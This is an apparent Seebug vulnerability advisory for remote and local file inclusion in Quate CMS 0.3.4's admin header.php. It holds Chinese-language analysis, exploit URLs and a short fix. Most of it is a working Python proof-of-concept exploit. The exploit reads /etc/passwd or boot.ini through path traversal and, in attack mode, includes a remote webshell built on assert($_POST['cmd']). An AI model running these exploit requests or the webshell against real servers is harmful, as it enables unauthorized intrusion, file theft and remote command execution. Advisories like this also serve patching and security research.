quate cms 0.3.4 lfi/rfi Multiple Vulnerabilities

2014-07-01T00:00:00
ID SSV:65420
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

1.2 Remote and Local File Include

1.2.1 漏洞分析

admin/includes/header.php

```php if ($bypass_installed != 1) { if (!is_file("../includes/installed")) { ... require("../includes/simple_gui.php"); exit(); } }

if ($bypass_restrict != 1) { require_once($secure_page_path. "includes/secure.php"); }

$admin_template_default = "default"; if ($not_logged_in != 1) { //echo $row_secure['account_theme']; if (file_exists("includes/themes/" .$row_secure['account_theme']. "/header.php")) { require_once("themes/" .$row_secure['account_theme']. "/header.php"); } else { require_once("themes/" .$admin_template_default. "/header.php"); } } else { require_once("themes/" .$admin_template_default. "/header.php"); }

```

1.2.2 漏洞利用

http://[host]/admin/includes/header.php?bypass_installed=1&secure_page_path=[rfi]? http://[host]/admin/includes/header.php?bypass_installed=1&bypass_restrict=1&row_secure[account_theme]=[rfi]?

1.2.3 漏洞修复

```php 需要关闭远程包含 php.ini中设置allow_url_include为off

if(@strstr($row_secure[account_theme],'..')){ exit(); } if(@strstr($secure_page_path,'..')){ exit(); } ```

                                        
                                            
                                                #!/usr/bin/env python
# -*- coding: utf-8 -*-

from lib.core.data import logger
from lib.core.enums import CUSTOM_LOGGING
from lib.request.basic import req as requests
from lib.core.poc import Output, POCBase
from lib.core.register import registerPoc as Register


class QuatecmsHeaderRFIPOC(POCBase):
    vulID = 'SSV-65640'  # vul ID
    version = '1'
    author = 'huakai'
    vulDate = '2008-08-06'
    createDate = '2015-10-15'
    updateDate = '2015-10-15'
    references = ['https://www.exploit-db.com/exploits/32186/']
    name = 'Quate CMS 0.3.4 - header.php Remote File Inclusion Vulnerabilities'
    appPowerLink = 'N/A'
    appName = 'Quate CMS'
    appVersion = '0.3.4'
    vulType = 'Remote File Inclusion'
    desc = u'''
    Quate CMS是运行在PHP和MySQL上的网站内容管理系统。
    header.php的参数未做好处理导致包含漏洞
    http://[host]/admin/includes/header.php?bypass_installed=1&secure_page_path=[rfi]?
    http://[host]/admin/includes/header.php?bypass_installed=1&bypass_restrict=1&row_secure[account_theme]=[rfi]?
    '''

    samples = ['']

    def in_win(self):
        verify_url = self.url + "/admin/includes/header.php?bypass_installed=1&secure_page_path" \
                                "=../../../../../../../../../../../boot.ini%00"
        r = requests.get(verify_url)
        if "[boot loader]" in r.text:
            return verify_url

    def in_linux(self):
        verify_url = self.url + "/admin/includes/header.php?bypass_installed=1&secure_page_path" \
                                "=../../../../../../../../../../../etc/passwd%00"
        r = requests.get(verify_url)
        if 'root:' and 'nobody:' in r.text:
            return verify_url

    def _verify(self):
        result = {}
        logger.log(CUSTOM_LOGGING.SYSINFO, u"开始尝试远程包含")
        verify_url = self.url + "/admin/includes/header.php?bypass_installed=1&secure_page_path" \
                                "=https://www.baidu.com/robots.txt?"
        r = requests.get(verify_url)
        if "Baiduspider" and "Googlebot" and "Disallow: /baidu" in r.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = verify_url
        else:
            logger.log(CUSTOM_LOGGING.SYSINFO, u"远程包含失败,开始尝试本地包含")
            if self.in_win():
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.in_win()
            elif self.in_linux():
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.in_linux()
        return self.parse_attack(result)

    def _attack(self):
        result = {}
        verify_url = self.url + "/admin/includes/header.php?bypass_installed=1&secure_page_path=http://[shell]"
        # shell内容 <?php @assert($_POST['cmd']);var_dump(md5(123));?>
        r = requests.get(verify_url)
        if "202cb962ac59075b964b07152d234b70" in r.text:
            result['ShellInfo'] = {}
            result['ShellInfo']['URL'] = verify_url
            result['ShellInfo']['Content'] = "@assert($_POST['cmd']);var_dump(md5(123));"
        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet Nothing returned')
        return output


Register(QuatecmsHeaderRFIPOC)